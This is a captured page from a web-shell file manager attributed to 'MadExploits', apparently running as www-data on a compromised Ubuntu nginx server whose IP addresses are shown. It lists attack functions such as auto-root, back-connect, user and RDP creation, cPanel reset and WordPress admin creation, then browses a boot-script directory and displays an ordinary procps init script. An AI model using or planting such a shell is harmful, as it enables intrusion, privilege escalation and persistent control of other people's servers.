Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
snap /
core /
17212 /
etc /
rcS.d /
[ HOME SHELL ]
Name
Size
Permission
Action
README
447
B
-rw-r--r--
S01console-setup
1.31
KB
-rwxr-xr-x
S02apparmor
6.08
KB
-rwxr-xr-x
S02hostname.sh
1.39
KB
-rwxr-xr-x
S02mountkernfs.sh
1.53
KB
-rwxr-xr-x
S02pppd-dns
612
B
-rwxr-xr-x
S02resolvconf
4.05
KB
-rwxr-xr-x
S03udev
5.94
KB
-rwxr-xr-x
S04keyboard-setup
1.76
KB
-rwxr-xr-x
S05mountdevsubfs.sh
1.43
KB
-rwxr-xr-x
S05procps
1.16
KB
-rwxr-xr-x
S06hwclock.sh
3.72
KB
-rwxr-xr-x
S07checkroot.sh
9.13
KB
-rwxr-xr-x
S08checkfs.sh
3.72
KB
-rwxr-xr-x
S09checkroot-bootclean.sh
1.07
KB
-rwxr-xr-x
S09kmod
2.04
KB
-rwxr-xr-x
S09urandom
3.04
KB
-rwxr-xr-x
S10mountall.sh
2.25
KB
-rwxr-xr-x
S10networking
4.66
KB
-rwxr-xr-x
S11mountall-bootclean.sh
703
B
-rwxr-xr-x
S11mountnfs.sh
2.4
KB
-rwxr-xr-x
S12mountnfs-bootclean.sh
711
B
-rwxr-xr-x
S13bootmisc.sh
1.25
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : S05procps
#! /bin/sh # /etc/init.d/procps: Set kernel variables from /etc/sysctl.conf # # written by Elrond <Elrond@Wunder-Nett.org> ### BEGIN INIT INFO # Provides: procps # Required-Start: mountkernfs $local_fs # Required-Stop: # Should-Start: udev module-init-tools # X-Start-Before: $network # Default-Start: S # Default-Stop: # Short-Description: Configure kernel parameters at boottime # Description: Loads kernel parameters that are specified in /etc/sysctl.conf ### END INIT INFO PATH=/sbin:/bin SYSCTL=/sbin/sysctl test -x $SYSCTL || exit 0 . /lib/lsb/init-functions # Comment this out for sysctl to print every item changed QUIET_SYSCTL="-q" # Check for existance of the default file and exit if not there, # Closes #52839 for the boot-floppy people if [ -f /etc/default/rcS ] ; then . /etc/default/rcS fi set -e case "$1" in start|restart|force-reload|reload) log_action_begin_msg "Setting kernel variables " STATUS=0 $SYSCTL $QUIET_SYSCTL --system || STATUS=$? log_action_end_msg $STATUS ;; stop) ;; status) ;; *) echo "Usage: /etc/init.d/procps {start|stop|restart|reload|force-reload|status}" >&2 exit 3 ;; esac exit 0
Close